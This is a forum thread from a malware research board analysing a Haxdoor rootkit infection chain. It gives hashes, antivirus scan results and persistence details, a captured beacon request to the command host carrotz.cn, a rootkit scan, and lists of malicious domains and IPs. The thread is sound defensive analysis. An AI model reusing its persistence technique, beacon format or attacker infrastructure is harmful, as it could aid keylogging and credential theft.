Help - Search - Members - Calendar
Full Version: file.exe - m.exe - ad.exe (Haxdoor rootkit)
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
Aug 5 2008, 06:02 PM
<h4>
File details
</h4>
File.exe is saved as tyYOerV.exe on our computer.

Filename: tyYOerV.exe

File size: 7168 bytes
MD5...: d24069f365f21c6b1147c816ffe34c2a
SHA1..: a5296101631be4b311a7c81fbd2a4b4e7d826ca4
SHA256: d9eb17bd9c9879a508422f6d704bd2bbe14890732d6a53dbd953d1e127cdc099
PEiD: -
QUOTE
File tyYOerV.exe received on 08.05.2008 17:36:58 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 -
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.05 -
AVG 8.0.0.156 2008.08.05 SHeur.CANO
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 TrojanDownloader.Agent.xlu
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 Suspicious File
eTrust-Vet 31.6.6011 2008.08.05 -
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 -
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 -
Ikarus T3.1.1.34.0 2008.08.05 -
K7AntiVirus 7.10.404 2008.08.05 -
Kaspersky 7.0.0.125 2008.08.05 -
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 -
NOD32v2 3329 2008.08.05 -
Norman 5.80.02 2008.08.05 -
Panda 9.0.0.4 2008.08.04 Suspicious file
PCTools 4.4.2.0 2008.08.05 -
Prevx1 V2 2008.08.05 -
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 -
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 PAK_Generic.001
VBA32 3.12.8.2 2008.08.05 -
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 Win32.Malware.gen (suspicious)
Kaspersky: Trojan-Downloader.Win32.Agent.zgz

<h4>
Notes
</h4>
Makes a backup of %system%\userinit.exe as %system%\stus.exe
Copies itself as %system%\userinit.exe so that the downloader is started when a user logs on. Ref.
QUOTE
c:\WINDOWS\system32\userinit.exe
Old date: 8/4/2004 2:00 PM
New date: 8/5/2008 5:31 PM
Old size: 24,576 bytes
New size: 7,168 bytes
Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

An instance of svchost.exe is launched by tyYOerV.exe.
IPB Image
A few moments later svchost.exe does request internet access.
IPB Image
The following files were downloaded
  • m.exe - saved as %Temp%\ie4.tmp
  • ad.exe - saved as %Temp%\ie6.tmp
Note: %Temp% is a variable that refers to the temporary folder. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).

<h4>
m.exe - ie4.tmp
</h4>
Filename: m.exe - ie4.tmp

File size: 135680 bytes
MD5...: 930371bcf7e30c81104c7a27351d14a4
SHA1..: 61b7f9b7cf115bdce1741fb120c4306f45fb2126
SHA256: a52891362f9c7e65d84452c2e744934211acf5a50e3428ec5577747b9922100b
PEiD: -
QUOTE
File ie4.tmp received on 08.05.2008 17:38:06 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 -
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.05 -
AVG 8.0.0.156 2008.08.05 -
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 Suspicious File
eTrust-Vet 31.6.6011 2008.08.05 -
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 -
F-Secure 7.60.13501.0 2008.08.05 -
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 -
Ikarus T3.1.1.34.0 2008.08.05 -
K7AntiVirus 7.10.404 2008.08.05 -
Kaspersky 7.0.0.125 2008.08.05 -
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 -
NOD32v2 3329 2008.08.05 -
Norman 5.80.02 2008.08.05 -
Panda 9.0.0.4 2008.08.04 -
PCTools 4.4.2.0 2008.08.05 -
Prevx1 V2 2008.08.05 -
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 -
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 -
VBA32 3.12.8.2 2008.08.05 -
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 -
Kaspersky: Trojan-Downloader.Win32.Small.aafl
IPB Image
Unfortunately the file closes with a fatal error upon execution in a VM. I suspect this to be one of those fake antivirus solutions. If possible I will update accordingly.
IPB Image
<h4>
ad.exe - ie6.tmp
</h4>
Filename: ad.exe - ie6.tmp

File size: 33924 bytes
MD5...: f35042e33f22e37608e4b3420cb2b654
SHA1..: c2a4fd953d173904bc787a4850867f69e7d70d67
SHA256: caa2ec11ac77e860ba02c551427fb9913792092d32f1b4b2164820ed91f970be
PEiD: UPX 2.90 [LZMA]
QUOTE
File ie6.tmp received on 08.05.2008 17:43:20 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 TR/Crypt.XPACK.Gen
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.05 Win32:Spyware-gen
AVG 8.0.0.156 2008.08.05 Win32/Heur
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 -
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 Suspicious File
eTrust-Vet 31.6.6011 2008.08.05 -
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 -
F-Secure 7.60.13501.0 2008.08.05 Trojan-Spy.Win32.Goldun.aqz
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 Trojan-Spy.Win32.Goldun.aqz
Ikarus T3.1.1.34.0 2008.08.05 Trojan.Crypt.XPACK
K7AntiVirus 7.10.404 2008.08.05 -
Kaspersky 7.0.0.125 2008.08.05 Trojan-Spy.Win32.Goldun.aqz
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 Trojan:Win32/Meredrop
NOD32v2 3329 2008.08.05 Win32/Spy.Goldun.NDF
Norman 5.80.02 2008.08.05 W32/Smalltroj.FRYT
Panda 9.0.0.4 2008.08.04 -
PCTools 4.4.2.0 2008.08.05 Trojan-Spy.Goldun!sd6
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 Mal/Generic-A
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 PAK_Generic.001
VBA32 3.12.8.2 2008.08.05 suspected of Malware-Cryptor.Win32.General.2
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 Trojan.Crypt.XPACK.Gen
This is the Haxdoor rootkit. Haxdoor is able to capture all user keystrokes (including confidential details such username, password, credit card number, etc.) and then sends the stolen info to a remote attacker.
IPB Image
Creates a memory page in the address space of Explorer.exe in order to load cryptmd5.dll.
Creates a global Keyboard hook.
Installs a kernel-mode driver into the system.
IPB Image
Explorer.exe does listen for incoming connections.
IPB Image
The following data was requested from www.carrotz.cn using a special User Agent.
CODE
GET /country/data.php?trackid=[removed] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; XP.2600.2976.xpsp2)
Host: www.carrotz.cn
~~~~~~~~~~: ~~~~~~~~~~
Rootkit Scan.
QUOTE
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-08-05 18:49:39
Windows 5.1.2600 Service Pack 2


---- System - GMER 1.0.14 ----

SSDT \SystemRoot\system32\dx9sr.sys ZwCreateProcess [0xF4CAB145]
SSDT \SystemRoot\system32\dx9sr.sys ZwCreateProcessEx [0xF4CAAB7C]
SSDT \SystemRoot\system32\dx9sr.sys ZwOpenKey [0xF4CAA412]
SSDT \SystemRoot\system32\dx9sr.sys ZwOpenProcess [0xF4CAA227]
SSDT \SystemRoot\system32\dx9sr.sys ZwQueryDirectoryFile [0xF4CAA8C8]

Code \SystemRoot\system32\dx9sr.sys IoCreateFile
Code \SystemRoot\system32\dx9sr.sys IoGetCurrentProcess
Code \SystemRoot\system32\dx9sr.sys PsGetCurrentProcess

---- Kernel code sections - GMER 1.0.14 ----

PAGE ntoskrnl.exe!IoCreateFile 805714F7 5 Bytes JMP F4CAA45D \SystemRoot\system32\dx9sr.sys

---- User code sections - GMER 1.0.14 ----

.text C:\Tools\gmer.exe[164] ntdll.dll!LdrLoadDll 7C9161CA 5 Bytes JMP 0001009F
.text C:\Tools\gmer.exe[164] USER32.DLL!GetDlgItemTextA + 2 77D9AC08 5 Bytes JMP 000107AA
.text C:\Tools\gmer.exe[164] wininet.dll!HttpOpenRequestA 771C4AC5 5 Bytes JMP 000104D6
.text C:\Tools\gmer.exe[164] wininet.dll!InternetCloseHandle + 2 771C61DE 5 Bytes JMP 00010603
.text C:\Tools\gmer.exe[164] wininet.dll!InternetOpenA + 2 771C6D2C 5 Bytes JMP 00010486
.text C:\Tools\gmer.exe[164] wininet.dll!HttpSendRequestA 771C76B8 5 Bytes JMP 100036F0 C:\WINDOWS\system32\cryptmd5.dll
.text C:\Tools\gmer.exe[164] wininet.dll!InternetReadFile + 2 771C9557 5 Bytes JMP 00010008
.text C:\Tools\gmer.exe[164] wininet.dll!InternetQueryDataAvailable + 2 771D3261 5 Bytes JMP 00010598
.text C:\Tools\gmer.exe[164] wininet.dll!InternetReadFileExA + 2 771F7E9C 5 Bytes JMP 00010519
.text C:\Tools\gmer.exe[164] wininet.dll!HttpSendRequestW 77211808 5 Bytes JMP 1000368D C:\WINDOWS\system32\cryptmd5.dll

---- Processes - GMER 1.0.14 ----

Library C:\WINDOWS\system32\cryptmd5.dll (*** hidden *** ) @ C:\Tools\gmer.exe [164] 0x10000000
Library C:\WINDOWS\system32\cryptmd5.dll (*** hidden *** ) @ C:\WINDOWS\Explorer.EXE [1260] 0x019A0000

---- Registry - GMER 1.0.14 ----

Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@DllName cryptmd5.dll
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@Startup cryptmd5
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@Impersonate 1
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@Asynchronous 1
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@MaxWait 1
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptmd5@meth [02F47407C30270018]

Reg HKLM\SOFTWARE\Classes\COMSNAP.CPartitionNotify\CurVer
Reg HKLM\SOFTWARE\Classes\COMSNAP.CPartitionNotify\CurVer@ COMSNAP.CPartitionNotify.1
Reg HKLM\SOFTWARE\Classes\RsmSink.Notify\CLSID
Reg HKLM\SOFTWARE\Classes\RsmSink.Notify\CLSID@ {0022DFD7-0469-49ff-BDD4-192CB402F5C6}
Reg HKLM\SOFTWARE\Classes\RsmSink.Notify\CurVer
Reg HKLM\SOFTWARE\Classes\RsmSink.Notify\CurVer@ RsmSink.Notify.1

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\cryptmd5.dll 21638 bytes executable
File C:\WINDOWS\system32\dx9sr.sys 8624 bytes executable

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\dx9sr.sys [SYSTEM] dx9sr

---- EOF - GMER 1.0.14 ----
Note: I left out legit entries in the rootkit scan as Haxdoor does hide the complete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify key.
______________________________

Filename: cryptmd5.dll

File size: 21638 bytes
MD5...: 682b6cf1bdeba7362e03835f74490a93
SHA1..: 867736e0d4781d37c8c062de0cd8e733d430481b
SHA256: 473ae97a112b8cefacc6f743bca12973a34be3cb1593b148f53c18491e53c959
PEiD: -
QUOTE
File cryptmd5.dll received on 08.05.2008 17:58:54 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 TR/Spy.Goldun.arb
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.05 -
AVG 8.0.0.156 2008.08.05 PSW.Generic6.VUZ
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 -
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 Suspicious File
eTrust-Vet 31.6.6011 2008.08.05 -
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 -
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 Trojan-Spy.Win32.Goldun.arb
Ikarus T3.1.1.34.0 2008.08.05 Trojan-Spy.Win32.Goldun.arb
K7AntiVirus 7.10.404 2008.08.05 -
Kaspersky 7.0.0.125 2008.08.05 Trojan-Spy.Win32.Goldun.arb
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 -
NOD32v2 3329 2008.08.05 Win32/Spy.Goldun.NCW
Norman 5.80.02 2008.08.05 W32/Goldun.CGS
Panda 9.0.0.4 2008.08.04 -
PCTools 4.4.2.0 2008.08.05 Trojan-Spy.Goldun!sd6
Prevx1 V2 2008.08.05 Suspicious
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 Mal/TinyDL-T
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 PAK_Generic.001
VBA32 3.12.8.2 2008.08.05 suspected of Trojan-Spy.Banker.49 (paranoid heuristics)
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 Trojan.Spy.Goldun.arb
______________________________

Filename: dx9sr.sys

File size: 8624 bytes
MD5...: a45a48dd29da9997eea867944771c63c
SHA1..: a1ac58d5b10dad4e8c1c810e33ea3a8e0448d56a
SHA256: d1b376998d7ffd0f73b31ee964020d5fe2236d7b4c5697a9659611ba6e0bb560
PEiD: -
QUOTE
File dx9sr.sys received on 08.05.2008 18:00:07 (CET)
AhnLab-V3 2008.8.6.0 2008.08.05 -
AntiVir 7.8.1.15 2008.08.05 TR/Rootkit.Gen
Authentium 5.1.0.4 2008.08.05 W32/Goldun.gen3
Avast 4.8.1195.0 2008.08.05 -
AVG 8.0.0.156 2008.08.05 PSW.Generic6.VVB
BitDefender 7.2 2008.08.05 -
CAT-QuickHeal 9.50 2008.08.04 -
ClamAV 0.93.1 2008.08.05 -
DrWeb 4.44.0.09170 2008.08.05 -
eSafe 7.0.17.0 2008.08.05 -
eTrust-Vet 31.6.6011 2008.08.05 Win32/ProcHide!generic
Ewido 4.0 2008.08.05 -
F-Prot 4.4.4.56 2008.08.04 W32/Goldun.gen3
F-Secure 7.60.13501.0 2008.08.05 Trojan-Spy.Win32.Goldun.ara
Fortinet 3.14.0.0 2008.08.05 -
GData 2.0.7306.1023 2008.08.05 Trojan-Spy.Win32.Goldun.ara
Ikarus T3.1.1.34.0 2008.08.05 Backdoor.Win32.Agent.fpj
K7AntiVirus 7.10.404 2008.08.05 Trojan-Spy.Win32.Goldun.ara
Kaspersky 7.0.0.125 2008.08.05 Trojan-Spy.Win32.Goldun.ara
McAfee 5353 2008.08.04 -
Microsoft 1.3807 2008.08.05 Backdoor:Win32/Haxdoor
NOD32v2 3329 2008.08.05 Win32/Spy.Goldun.NDF
Norman 5.80.02 2008.08.05 -
Panda 9.0.0.4 2008.08.04 -
PCTools 4.4.2.0 2008.08.05 Trojan-Spy.Goldun!sd6
Prevx1 V2 2008.08.05 -
Rising 20.56.12.00 2008.08.05 -
Sophos 4.31.0 2008.08.05 -
Sunbelt 3.1.1537.1 2008.08.01 -
Symantec 10 2008.08.05 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.05 -
VBA32 3.12.8.2 2008.08.05 suspected of Rootkit.Agent.10
ViRobot 2008.8.5.1324 2008.08.05 -
VirusBuster 4.5.11.0 2008.08.04 -
Webwasher-Gateway 6.6.2 2008.08.05 Trojan.Rootkit.Gen
Kimberly
Aug 5 2008, 11:19 PM
<h4>
Update on m.exe - ie4.tmp
</h4>
Screenshots are pretty explicit ... www.winifixer.com - av-xp-08.com - youpornztube.net
IPB Image
IPB Image
IPB Image
There's a lot more like ...
  • Dumping installed software
  • Dumping running processes
  • Platform
  • Processor
  • etc ...
but I really ain't an enthusiastic of those fake antivirus applications.

Couple of older write ups for those interested.<h4>
IP details
</h4>
58.65.234.81
  1. bulletproof-service.com
  2. cmd1.net
  3. dataupsup.com
  4. feels-energy.com
  5. forexnamtrade.com
  6. googleartz.com
  7. harsdorfsgroup.com
  8. hosting-offshore.biz
  9. j-sex.biz
  10. kup9.com
  11. latviawebfinance.com
  12. love-true.com
  13. novii-forum-pro.com
  14. platinbank.net
  15. probiva.cn
  16. probiva.net
  17. secretdesire.biz
  18. togmonet.biz
  19. universal-chat.net
  20. viennafinance.net
  21. worldsecret.ws
  22. wsccinternational.com
______________________________

202.75.38.130
  1. carrotz.cn
  2. gazenvagen.com
  3. googleprank.cn
  4. musicstreamnet.info
  5. zarazza.cn
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.